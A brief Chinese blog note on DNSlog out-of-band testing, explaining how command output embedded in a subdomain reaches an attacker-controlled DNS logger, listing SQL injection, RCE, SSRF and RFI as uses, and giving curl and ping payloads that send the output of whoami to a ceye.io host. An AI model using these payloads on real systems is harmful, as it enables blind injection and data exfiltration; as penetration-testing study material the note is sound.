1.原理
通过恶意payload组合的三级域名后对服务器发起的DNS请求。
2.利用场景
- SQL注入
- RCE(远程命令执行)
- SSRF(服务端请求伪造)
- RFI(远程文件包含)
3.Payload example
curl http://huanxin.ceye.io/`whoami` ping `whoami`.huanxin.ceye.io
总结:一切存有HTTP请求,域名请求时都可尝试DNSlog
标签:DNSlog,ceye,huanxin,io,whoami,请求 From: https://www.cnblogs.com/huan-xin/p/17157830.html